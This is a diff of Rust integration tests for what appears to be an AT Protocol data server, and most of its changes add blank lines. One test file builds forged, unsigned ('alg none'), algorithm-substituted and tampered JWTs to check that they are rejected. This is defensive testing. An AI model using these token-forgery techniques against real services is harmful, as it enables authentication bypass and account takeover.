··· 11 11 use std::collections::BTreeMap; 12 12 use wiremock::matchers::{method, path}; 13 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 + 14 15 fn make_cid(data: &[u8]) -> Cid { 15 16 let mut hasher = Sha256::new(); 16 17 hasher.update(data); ··· 18 19 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 19 20 Cid::new_v1(0x71, multihash) 20 21 } 22 + 21 23 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 22 24 loop { 23 25 let mut byte = (value & 0x7F) as u8; ··· 31 33 } 32 34 } 33 35 } 36 + 34 37 fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> { 35 38 let cid_bytes = cid.to_bytes(); 36 39 let mut result = Vec::new(); ··· 39 42 result.extend_from_slice(data); 40 43 result 41 44 } 45 + 42 46 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 43 47 let public_key = signing_key.verifying_key(); 44 48 let compressed = public_key.to_sec1_bytes(); ··· 55 59 buf.extend_from_slice(&compressed); 56 60 multibase::encode(multibase::Base::Base58Btc, buf) 57 61 } 62 + 58 63 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value { 59 64 let multikey = get_multikey_from_signing_key(signing_key); 60 65 json!({ ··· 77 82 }] 78 83 }) 79 84 } 85 + 80 86 fn create_signed_commit( 81 87 did: &str, 82 88 data_cid: &Cid, ··· 106 112 let cid = make_cid(&signed_bytes); 107 113 (signed_bytes, cid) 108 114 } 115 + 109 116 fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) { 110 117 let ipld_entries: Vec<Ipld> = entries 111 118 .into_iter() ··· 124 131 let cid = make_cid(&bytes); 125 132 (bytes, cid) 126 133 } 134 + 127 135 fn create_record() -> (Vec<u8>, Cid) { 128 136 let record = Ipld::Map(BTreeMap::from([ 129 137 ("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
··· 2 2 use common::*; 3 3 use reqwest::StatusCode; 4 4 use serde_json::{Value, json}; 5 + 5 6 #[tokio::test] 6 7 async fn test_create_invite_code_success() { 7 8 let client = client(); ··· 26 27 assert!(!code.is_empty()); 27 28 assert!(code.contains('-'), "Code should be a UUID format"); 28 29 } 30 + 29 31 #[tokio::test] 30 32 async fn test_create_invite_code_no_auth() { 31 33 let client = client(); ··· 45 47 let body: Value = res.json().await.expect("Response was not valid JSON"); 46 48 assert_eq!(body["error"], "AuthenticationRequired"); 47 49 } 50 + 48 51 #[tokio::test] 49 52 async fn test_create_invite_code_invalid_use_count() { 50 53 let client = client(); ··· 66 69 let body: Value = res.json().await.expect("Response was not valid JSON"); 67 70 assert_eq!(body["error"], "InvalidRequest"); 68 71 } 72 + 69 73 #[tokio::test] 70 74 async fn test_create_invite_code_for_another_account() { 71 75 let client = client(); ··· 89 93 let body: Value = res.json().await.expect("Response was not valid JSON"); 90 94 assert!(body["code"].is_string()); 91 95 } 96 + 92 97 #[tokio::test] 93 98 async fn test_create_invite_codes_success() { 94 99 let client = client(); ··· 114 119 assert_eq!(codes.len(), 1); 115 120 assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3); 116 121 } 122 + 117 123 #[tokio::test] 118 124 async fn test_create_invite_codes_for_multiple_accounts() { 119 125 let client = client(); ··· 143 149 assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2); 144 150 } 145 151 } 152 + 146 153 #[tokio::test] 147 154 async fn test_create_invite_codes_no_auth() { 148 155 let client = client(); ··· 160 167 .expect("Failed to send request"); 161 168 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 162 169 } 170 + 163 171 #[tokio::test] 164 172 async fn test_get_account_invite_codes_success() { 165 173 let client = client(); ··· 198 206 assert!(code["createdAt"].is_string()); 199 207 assert!(code["uses"].is_array()); 200 208 } 209 + 201 210 #[tokio::test] 202 211 async fn test_get_account_invite_codes_no_auth() { 203 212 let client = client(); ··· 211 220 .expect("Failed to send request"); 212 221 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 213 222 } 223 + 214 224 #[tokio::test] 215 225 async fn test_get_account_invite_codes_include_used_filter() { 216 226 let client = client();
+43
tests/jwt_security.rs
··· 15 15 use reqwest::StatusCode; 16 16 use serde_json::{json, Value}; 17 17 use sha2::{Digest, Sha256}; 18 + 18 19 fn generate_user_key() -> Vec<u8> { 19 20 let secret_key = SecretKey::random(&mut OsRng); 20 21 secret_key.to_bytes().to_vec() 21 22 } 23 + 22 24 fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String { 23 25 let signing_key = SigningKey::from_slice(key_bytes).expect("valid key"); 24 26 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); ··· 28 30 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 29 31 format!("{}.{}", message, signature_b64) 30 32 } 33 + 31 34 fn create_unsigned_jwt(header: &Value, claims: &Value) -> String { 32 35 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); 33 36 let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap()); 34 37 format!("{}.{}.", header_b64, claims_b64) 35 38 } 39 + 36 40 #[test] 37 41 fn test_jwt_security_forged_signature_rejected() { 38 42 let key_bytes = generate_user_key(); ··· 46 50 let err_msg = result.err().unwrap().to_string(); 47 51 assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg); 48 52 } 53 + 49 54 #[test] 50 55 fn test_jwt_security_modified_payload_rejected() { 51 56 let key_bytes = generate_user_key(); ··· 60 65 let result = verify_access_token(&modified_token, &key_bytes); 61 66 assert!(result.is_err(), "Modified payload must be rejected"); 62 67 } 68 + 63 69 #[test] 64 70 fn test_jwt_security_algorithm_none_attack_rejected() { 65 71 let key_bytes = generate_user_key(); ··· 81 87 let result = verify_access_token(&malicious_token, &key_bytes); 82 88 assert!(result.is_err(), "Algorithm 'none' attack must be rejected"); 83 89 } 90 + 84 91 #[test] 85 92 fn test_jwt_security_algorithm_substitution_hs256_rejected() { 86 93 let key_bytes = generate_user_key(); ··· 111 118 let result = verify_access_token(&malicious_token, &key_bytes); 112 119 assert!(result.is_err(), "HS256 algorithm substitution must be rejected"); 113 120 } 121 + 114 122 #[test] 115 123 fn test_jwt_security_algorithm_substitution_rs256_rejected() { 116 124 let key_bytes = generate_user_key(); ··· 135 143 let result = verify_access_token(&malicious_token, &key_bytes); 136 144 assert!(result.is_err(), "RS256 algorithm substitution must be rejected"); 137 145 } 146 + 138 147 #[test] 139 148 fn test_jwt_security_algorithm_substitution_es256_rejected() { 140 149 let key_bytes = generate_user_key(); ··· 159 168 let result = verify_access_token(&malicious_token, &key_bytes); 160 169 assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"); 161 170 } 171 + 162 172 #[test] 163 173 fn test_jwt_security_token_type_confusion_refresh_as_access() { 164 174 let key_bytes = generate_user_key(); ··· 169 179 let err_msg = result.err().unwrap().to_string(); 170 180 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 171 181 } 182 + 172 183 #[test] 173 184 fn test_jwt_security_token_type_confusion_access_as_refresh() { 174 185 let key_bytes = generate_user_key(); ··· 179 190 let err_msg = result.err().unwrap().to_string(); 180 191 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 181 192 } 193 + 182 194 #[test] 183 195 fn test_jwt_security_token_type_confusion_service_as_access() { 184 196 let key_bytes = generate_user_key(); ··· 188 200 let result = verify_access_token(&service_token, &key_bytes); 189 201 assert!(result.is_err(), "Service token must not be accepted as access token"); 190 202 } 203 + 191 204 #[test] 192 205 fn test_jwt_security_scope_manipulation_attack() { 193 206 let key_bytes = generate_user_key(); ··· 211 224 let err_msg = result.err().unwrap().to_string(); 212 225 assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg); 213 226 } 227 + 214 228 #[test] 215 229 fn test_jwt_security_empty_scope_rejected() { 216 230 let key_bytes = generate_user_key(); ··· 232 246 let result = verify_access_token(&token, &key_bytes); 233 247 assert!(result.is_err(), "Empty scope must be rejected for access tokens"); 234 248 } 249 + 235 250 #[test] 236 251 fn test_jwt_security_missing_scope_rejected() { 237 252 let key_bytes = generate_user_key(); ··· 252 267 let result = verify_access_token(&token, &key_bytes); 253 268 assert!(result.is_err(), "Missing scope must be rejected for access tokens"); 254 269 } 270 + 255 271 #[test] 256 272 fn test_jwt_security_expired_token_rejected() { 257 273 let key_bytes = generate_user_key(); ··· 275 291 let err_msg = result.err().unwrap().to_string(); 276 292 assert!(err_msg.contains("expired"), "Error: {}", err_msg); 277 293 } 294 + 278 295 #[test] 279 296 fn test_jwt_security_future_iat_accepted() { 280 297 let key_bytes = generate_user_key(); ··· 296 313 let result = verify_access_token(&token, &key_bytes); 297 314 assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance"); 298 315 } 316 + 299 317 #[test] 300 318 fn test_jwt_security_cross_user_key_attack() { 301 319 let key_bytes_user1 = generate_user_key(); ··· 305 323 let result = verify_access_token(&token, &key_bytes_user2); 306 324 assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key"); 307 325 } 326 + 308 327 #[test] 309 328 fn test_jwt_security_signature_truncation_rejected() { 310 329 let key_bytes = generate_user_key(); ··· 317 336 let result = verify_access_token(&truncated_token, &key_bytes); 318 337 assert!(result.is_err(), "Truncated signature must be rejected"); 319 338 } 339 + 320 340 #[test] 321 341 fn test_jwt_security_signature_extension_rejected() { 322 342 let key_bytes = generate_user_key(); ··· 330 350 let result = verify_access_token(&extended_token, &key_bytes); 331 351 assert!(result.is_err(), "Extended signature must be rejected"); 332 352 } 353 + 333 354 #[test] 334 355 fn test_jwt_security_malformed_tokens_rejected() { 335 356 let key_bytes = generate_user_key(); ··· 352 373 if token.len() > 40 { &token[..40] } else { token }); 353 374 } 354 375 } 376 + 355 377 #[test] 356 378 fn test_jwt_security_missing_required_claims_rejected() { 357 379 let key_bytes = generate_user_key(); ··· 389 411 assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim); 390 412 } 391 413 } 414 + 392 415 #[test] 393 416 fn test_jwt_security_invalid_header_json_rejected() { 394 417 let key_bytes = generate_user_key(); ··· 399 422 let result = verify_access_token(&malicious_token, &key_bytes); 400 423 assert!(result.is_err(), "Invalid header JSON must be rejected"); 401 424 } 425 + 402 426 #[test] 403 427 fn test_jwt_security_invalid_claims_json_rejected() { 404 428 let key_bytes = generate_user_key(); ··· 409 433 let result = verify_access_token(&malicious_token, &key_bytes); 410 434 assert!(result.is_err(), "Invalid claims JSON must be rejected"); 411 435 } 436 + 412 437 #[test] 413 438 fn test_jwt_security_header_injection_attack() { 414 439 let key_bytes = generate_user_key(); ··· 432 457 let result = verify_access_token(&token, &key_bytes); 433 458 assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)"); 434 459 } 460 + 435 461 #[test] 436 462 fn test_jwt_security_claims_type_confusion() { 437 463 let key_bytes = generate_user_key(); ··· 452 478 let result = verify_access_token(&token, &key_bytes); 453 479 assert!(result.is_err(), "Claims with wrong types must be rejected"); 454 480 } 481 + 455 482 #[test] 456 483 fn test_jwt_security_unicode_injection_in_claims() { 457 484 let key_bytes = generate_user_key(); ··· 475 502 assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected"); 476 503 } 477 504 } 505 + 478 506 #[test] 479 507 fn test_jwt_security_signature_verification_is_constant_time() { 480 508 let key_bytes = generate_user_key(); ··· 491 519 let _result2 = verify_access_token(&completely_invalid_token, &key_bytes); 492 520 assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)"); 493 521 } 522 + 494 523 #[test] 495 524 fn test_jwt_security_valid_scopes_accepted() { 496 525 let key_bytes = generate_user_key(); ··· 519 548 assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope); 520 549 } 521 550 } 551 + 522 552 #[test] 523 553 fn test_jwt_security_refresh_token_scope_rejected_as_access() { 524 554 let key_bytes = generate_user_key(); ··· 540 570 let result = verify_access_token(&token, &key_bytes); 541 571 assert!(result.is_err(), "Refresh scope with access token type must be rejected"); 542 572 } 573 + 543 574 #[test] 544 575 fn test_jwt_security_get_did_extraction_safe() { 545 576 let key_bytes = generate_user_key(); ··· 557 588 let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe"); 558 589 assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)"); 559 590 } 591 + 560 592 #[test] 561 593 fn test_jwt_security_get_jti_extraction_safe() { 562 594 let key_bytes = generate_user_key(); ··· 572 604 let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 573 605 assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error"); 574 606 } 607 + 575 608 #[test] 576 609 fn test_jwt_security_key_from_invalid_bytes_rejected() { 577 610 let invalid_keys: Vec<&[u8]> = vec![ ··· 591 624 } 592 625 } 593 626 } 627 + 594 628 #[test] 595 629 fn test_jwt_security_boundary_exp_values() { 596 630 let key_bytes = generate_user_key(); ··· 624 658 let result2 = verify_access_token(&token2, &key_bytes); 625 659 assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable"); 626 660 } 661 + 627 662 #[test] 628 663 fn test_jwt_security_very_long_exp_handled() { 629 664 let key_bytes = generate_user_key(); ··· 644 679 let token = create_custom_jwt(&header, &claims, &key_bytes); 645 680 let _result = verify_access_token(&token, &key_bytes); 646 681 } 682 + 647 683 #[test] 648 684 fn test_jwt_security_negative_timestamps_handled() { 649 685 let key_bytes = generate_user_key(); ··· 664 700 let token = create_custom_jwt(&header, &claims, &key_bytes); 665 701 let _result = verify_access_token(&token, &key_bytes); 666 702 } 703 + 667 704 #[tokio::test] 668 705 async fn test_jwt_security_server_rejects_forged_session_token() { 669 706 let url = base_url().await; ··· 679 716 .unwrap(); 680 717 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected"); 681 718 } 719 + 682 720 #[tokio::test] 683 721 async fn test_jwt_security_server_rejects_expired_token() { 684 722 let url = base_url().await; ··· 698 736 .unwrap(); 699 737 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected"); 700 738 } 739 + 701 740 #[tokio::test] 702 741 async fn test_jwt_security_server_rejects_tampered_did() { 703 742 let url = base_url().await; ··· 718 757 .unwrap(); 719 758 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected"); 720 759 } 760 + 721 761 #[tokio::test] 722 762 async fn test_jwt_security_refresh_token_replay_protection() { 723 763 let url = base_url().await; ··· 780 820 .unwrap(); 781 821 assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected"); 782 822 } 823 + 783 824 #[tokio::test] 784 825 async fn test_jwt_security_authorization_header_formats() { 785 826 let url = base_url().await; ··· 821 862 .unwrap(); 822 863 assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected"); 823 864 } 865 + 824 866 #[tokio::test] 825 867 async fn test_jwt_security_deleted_session_rejected() { 826 868 let url = base_url().await; ··· 848 890 .unwrap(); 849 891 assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout"); 850 892 } 893 + 851 894 #[tokio::test] 852 895 async fn test_jwt_security_deactivated_account_rejected() { 853 896 let url = base_url().await;
+23
tests/lifecycle_record.rs
··· 6 6 use reqwest::{StatusCode, header}; 7 7 use serde_json::{Value, json}; 8 8 use std::time::Duration; 9 + 9 10 #[tokio::test] 10 11 async fn test_post_crud_lifecycle() { 11 12 let client = client(); ··· 155 156 "Record was found, but it should be deleted" 156 157 ); 157 158 } 159 + 158 160 #[tokio::test] 159 161 async fn test_record_update_conflict_lifecycle() { 160 162 let client = client(); ··· 280 282 "v3 (good) update failed" 281 283 ); 282 284 } 285 + 283 286 #[tokio::test] 284 287 async fn test_profile_lifecycle() { 285 288 let client = client(); ··· 362 365 let updated_body: Value = get_updated_res.json().await.unwrap(); 363 366 assert_eq!(updated_body["value"]["displayName"], "Updated User"); 364 367 } 368 + 365 369 #[tokio::test] 366 370 async fn test_reply_thread_lifecycle() { 367 371 let client = client(); ··· 457 461 .expect("Failed to create nested reply"); 458 462 assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 459 463 } 464 + 460 465 #[tokio::test] 461 466 async fn test_blob_in_record_lifecycle() { 462 467 let client = client(); ··· 514 519 let profile: Value = get_res.json().await.unwrap(); 515 520 assert!(profile["value"]["avatar"]["ref"]["$link"].is_string()); 516 521 } 522 + 517 523 #[tokio::test] 518 524 async fn test_authorization_cannot_modify_other_repo() { 519 525 let client = client(); ··· 545 551 res.status() 546 552 ); 547 553 } 554 + 548 555 #[tokio::test] 549 556 async fn test_authorization_cannot_delete_other_record() { 550 557 let client = client(); ··· 587 594 .expect("Failed to verify record exists"); 588 595 assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 589 596 } 597 + 590 598 #[tokio::test] 591 599 async fn test_apply_writes_batch_lifecycle() { 592 600 let client = client(); ··· 747 755 "Batch-deleted post should be gone" 748 756 ); 749 757 } 758 + 750 759 async fn create_post_with_rkey( 751 760 client: &reqwest::Client, 752 761 did: &str, ··· 781 790 body["cid"].as_str().unwrap().to_string(), 782 791 ) 783 792 } 793 + 784 794 #[tokio::test] 785 795 async fn test_list_records_default_order() { 786 796 let client = client(); ··· 812 822 .collect(); 813 823 assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)"); 814 824 } 825 + 815 826 #[tokio::test] 816 827 async fn test_list_records_reverse_true() { 817 828 let client = client(); ··· 843 854 .collect(); 844 855 assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)"); 845 856 } 857 + 846 858 #[tokio::test] 847 859 async fn test_list_records_cursor_pagination() { 848 860 let client = client(); ··· 895 907 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 896 908 assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 897 909 } 910 + 898 911 #[tokio::test] 899 912 async fn test_list_records_rkey_start() { 900 913 let client = client(); ··· 928 941 assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start"); 929 942 } 930 943 } 944 + 931 945 #[tokio::test] 932 946 async fn test_list_records_rkey_end() { 933 947 let client = client(); ··· 961 975 assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end"); 962 976 } 963 977 } 978 + 964 979 #[tokio::test] 965 980 async fn test_list_records_rkey_range() { 966 981 let client = client(); ··· 997 1012 } 998 1013 assert!(!rkeys.is_empty(), "Should have at least some records in range"); 999 1014 } 1015 + 1000 1016 #[tokio::test] 1001 1017 async fn test_list_records_limit_clamping_max() { 1002 1018 let client = client(); ··· 1022 1038 let records = body["records"].as_array().unwrap(); 1023 1039 assert!(records.len() <= 100, "Limit should be clamped to max 100"); 1024 1040 } 1041 + 1025 1042 #[tokio::test] 1026 1043 async fn test_list_records_limit_clamping_min() { 1027 1044 let client = client(); ··· 1045 1062 let records = body["records"].as_array().unwrap(); 1046 1063 assert!(records.len() >= 1, "Limit should be clamped to min 1"); 1047 1064 } 1065 + 1048 1066 #[tokio::test] 1049 1067 async fn test_list_records_empty_collection() { 1050 1068 let client = client(); ··· 1067 1085 assert!(records.is_empty(), "Empty collection should return empty array"); 1068 1086 assert!(body["cursor"].is_null(), "Empty collection should have no cursor"); 1069 1087 } 1088 + 1070 1089 #[tokio::test] 1071 1090 async fn test_list_records_exact_limit() { 1072 1091 let client = client(); ··· 1092 1111 let records = body["records"].as_array().unwrap(); 1093 1112 assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5"); 1094 1113 } 1114 + 1095 1115 #[tokio::test] 1096 1116 async fn test_list_records_cursor_exhaustion() { 1097 1117 let client = client(); ··· 1117 1137 let records = body["records"].as_array().unwrap(); 1118 1138 assert_eq!(records.len(), 3); 1119 1139 } 1140 + 1120 1141 #[tokio::test] 1121 1142 async fn test_list_records_repo_not_found() { 1122 1143 let client = client(); ··· 1134 1155 .expect("Failed to list records"); 1135 1156 assert_eq!(res.status(), StatusCode::NOT_FOUND); 1136 1157 } 1158 + 1137 1159 #[tokio::test] 1138 1160 async fn test_list_records_includes_cid() { 1139 1161 let client = client(); ··· 1162 1184 assert!(cid.starts_with("bafy"), "CID should be valid"); 1163 1185 } 1164 1186 } 1187 + 1165 1188 #[tokio::test] 1166 1189 async fn test_list_records_cursor_with_reverse() { 1167 1190 let client = client();
+7
tests/lifecycle_session.rs
··· 5 5 use chrono::Utc; 6 6 use reqwest::StatusCode; 7 7 use serde_json::{Value, json}; 8 + 8 9 #[tokio::test] 9 10 async fn test_session_lifecycle_wrong_password() { 10 11 let client = client(); ··· 28 29 res.status() 29 30 ); 30 31 } 32 + 31 33 #[tokio::test] 32 34 async fn test_session_lifecycle_multiple_sessions() { 33 35 let client = client(); ··· 103 105 .expect("Failed getSession 2"); 104 106 assert_eq!(get2.status(), StatusCode::OK); 105 107 } 108 + 106 109 #[tokio::test] 107 110 async fn test_session_lifecycle_refresh_invalidates_old() { 108 111 let client = client(); ··· 169 172 "Old refresh token should be invalid after use" 170 173 ); 171 174 } 175 + 172 176 #[tokio::test] 173 177 async fn test_app_password_lifecycle() { 174 178 let client = client(); ··· 275 279 let passwords_after = list_after["passwords"].as_array().unwrap(); 276 280 assert_eq!(passwords_after.len(), 0, "No app passwords should remain"); 277 281 } 282 + 278 283 #[tokio::test] 279 284 async fn test_account_deactivation_lifecycle() { 280 285 let client = client(); ··· 362 367 let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await; 363 368 assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation"); 364 369 } 370 + 365 371 #[tokio::test] 366 372 async fn test_service_auth_lifecycle() { 367 373 let client = client(); ··· 393 399 assert_eq!(claims["aud"], "did:web:api.bsky.app"); 394 400 assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob"); 395 401 } 402 + 396 403 #[tokio::test] 397 404 async fn test_request_account_delete() { 398 405 let client = client();
+7
tests/lifecycle_social.rs
··· 6 6 use serde_json::{Value, json}; 7 7 use std::time::Duration; 8 8 use chrono::Utc; 9 + 9 10 #[tokio::test] 10 11 async fn test_social_flow_lifecycle() { 11 12 let client = client(); ··· 111 112 "Only post 2 should remain" 112 113 ); 113 114 } 115 + 114 116 #[tokio::test] 115 117 async fn test_like_lifecycle() { 116 118 let client = client(); ··· 166 168 .expect("Failed to check deleted like"); 167 169 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Like should be deleted"); 168 170 } 171 + 169 172 #[tokio::test] 170 173 async fn test_repost_lifecycle() { 171 174 let client = client(); ··· 207 210 .expect("Failed to delete repost"); 208 211 assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete repost"); 209 212 } 213 + 210 214 #[tokio::test] 211 215 async fn test_unfollow_lifecycle() { 212 216 let client = client(); ··· 259 263 .expect("Failed to check deleted follow"); 260 264 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Follow should be deleted"); 261 265 } 266 + 262 267 #[tokio::test] 263 268 async fn test_timeline_after_unfollow() { 264 269 let client = client(); ··· 311 316 let feed_after = timeline_after["feed"].as_array().unwrap(); 312 317 assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing"); 313 318 } 319 + 314 320 #[tokio::test] 315 321 async fn test_mutual_follow_lifecycle() { 316 322 let client = client(); ··· 348 354 let bob_feed = bob_tl["feed"].as_array().unwrap(); 349 355 assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post"); 350 356 } 357 + 351 358 #[tokio::test] 352 359 async fn test_account_to_post_full_lifecycle() { 353 360 let client = client();
+1
tests/moderation.rs
··· 4 4 use helpers::*; 5 5 use reqwest::StatusCode; 6 6 use serde_json::{Value, json}; 7 + 7 8 #[tokio::test] 8 9 async fn test_moderation_report_lifecycle() { 9 10 let client = client();
+4
tests/notifications.rs
··· 4 4 NotificationStatus, NotificationType, 5 5 }; 6 6 use sqlx::PgPool; 7 + 7 8 async fn get_pool() -> PgPool { 8 9 let conn_str = common::get_db_connection_string().await; 9 10 sqlx::postgres::PgPoolOptions::new() ··· 12 13 .await 13 14 .expect("Failed to connect to test database") 14 15 } 16 + 15 17 #[tokio::test] 16 18 async fn test_enqueue_notification() { 17 19 let pool = get_pool().await; ··· 53 55 assert_eq!(row.notification_type, NotificationType::Welcome); 54 56 assert_eq!(row.status, NotificationStatus::Pending); 55 57 } 58 + 56 59 #[tokio::test] 57 60 async fn test_enqueue_welcome() { 58 61 let pool = get_pool().await; ··· 82 85 assert!(row.body.contains(&format!("@{}", user_row.handle))); 83 86 assert_eq!(row.notification_type, NotificationType::Welcome); 84 87 } 88 + 85 89 #[tokio::test] 86 90 async fn test_notification_queue_status_index() { 87 91 let pool = get_pool().await;
+3
tests/oauth.rs
··· 8 8 use sha2::{Digest, Sha256}; 9 9 use wiremock::{Mock, MockServer, ResponseTemplate}; 10 10 use wiremock::matchers::{method, path}; 11 + 11 12 fn no_redirect_client() -> reqwest::Client { 12 13 reqwest::Client::builder() 13 14 .redirect(redirect::Policy::none()) 14 15 .build() 15 16 .unwrap() 16 17 } 18 + 17 19 fn generate_pkce() -> (String, String) { 18 20 let verifier_bytes: [u8; 32] = rand::random(); 19 21 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 23 25 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 24 26 (code_verifier, code_challenge) 25 27 } 28 + 26 29 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 27 30 let mock_server = MockServer::start().await; 28 31 let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + 3 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 5 use chrono::Utc; 5 6 use common::{base_url, client}; ··· 9 10 use sha2::{Digest, Sha256}; 10 11 use wiremock::{Mock, MockServer, ResponseTemplate}; 11 12 use wiremock::matchers::{method, path}; 13 + 12 14 fn generate_pkce() -> (String, String) { 13 15 let verifier_bytes: [u8; 32] = rand::random(); 14 16 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 18 20 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 19 21 (code_verifier, code_challenge) 20 22 } 23 + 21 24 fn no_redirect_client() -> reqwest::Client { 22 25 reqwest::Client::builder() 23 26 .redirect(redirect::Policy::none()) 24 27 .build() 25 28 .unwrap() 26 29 } 30 + 27 31 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 28 32 let mock_server = MockServer::start().await; 29 33 let client_id = mock_server.uri(); ··· 43 47 .await; 44 48 mock_server 45 49 } 50 + 46 51 struct OAuthSession { 47 52 access_token: String, 48 53 refresh_token: String, 49 54 did: String, 50 55 client_id: String, 51 56 } 57 + 52 58 async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) { 53 59 let url = base_url().await; 54 60 let http_client = client(); ··· 125 131 }; 126 132 (session, mock_client) 127 133 } 134 + 128 135 #[tokio::test] 129 136 async fn test_oauth_token_can_create_and_read_records() { 130 137 let url = base_url().await; ··· 169 176 let get_body: Value = get_res.json().await.unwrap(); 170 177 assert_eq!(get_body["value"]["text"], post_text); 171 178 } 179 + 172 180 #[tokio::test] 173 181 async fn test_oauth_token_can_upload_blob() { 174 182 let url = base_url().await; ··· 191 199 assert!(upload_body["blob"]["ref"]["$link"].is_string()); 192 200 assert_eq!(upload_body["blob"]["mimeType"], "text/plain"); 193 201 } 202 + 194 203 #[tokio::test] 195 204 async fn test_oauth_token_can_describe_repo() { 196 205 let url = base_url().await; ··· 211 220 assert_eq!(describe_body["did"], session.did); 212 221 assert!(describe_body["handle"].is_string()); 213 222 } 223 + 214 224 #[tokio::test] 215 225 async fn test_oauth_full_post_lifecycle_create_edit_delete() { 216 226 let url = base_url().await; ··· 300 310 get_deleted_res.status() 301 311 ); 302 312 } 313 + 303 314 #[tokio::test] 304 315 async fn test_oauth_batch_operations_apply_writes() { 305 316 let url = base_url().await; ··· 367 378 let records = list_body["records"].as_array().unwrap(); 368 379 assert!(records.len() >= 3, "Should have at least 3 records from batch"); 369 380 } 381 + 370 382 #[tokio::test] 371 383 async fn test_oauth_token_refresh_maintains_access() { 372 384 let url = base_url().await; ··· 437 449 let records = list_body["records"].as_array().unwrap(); 438 450 assert_eq!(records.len(), 2, "Should have both posts"); 439 451 } 452 + 440 453 #[tokio::test] 441 454 async fn test_oauth_revoked_token_cannot_access_resources() { 442 455 let url = base_url().await; ··· 481 494 .unwrap(); 482 495 assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work"); 483 496 } 497 + 484 498 #[tokio::test] 485 499 async fn test_oauth_multiple_clients_same_user() { 486 500 let url = base_url().await; ··· 640 654 let records = list_body["records"].as_array().unwrap(); 641 655 assert_eq!(records.len(), 2, "Both posts should be visible to either client"); 642 656 } 657 + 643 658 #[tokio::test] 644 659 async fn test_oauth_social_interactions_follow_like_repost() { 645 660 let url = base_url().await; ··· 757 772 let likes = likes_body["records"].as_array().unwrap(); 758 773 assert_eq!(likes.len(), 1, "Bob should have 1 like"); 759 774 } 775 + 760 776 #[tokio::test] 761 777 async fn test_oauth_cannot_modify_other_users_repo() { 762 778 let url = base_url().await; ··· 804 820 let posts = posts_body["records"].as_array().unwrap(); 805 821 assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob"); 806 822 } 823 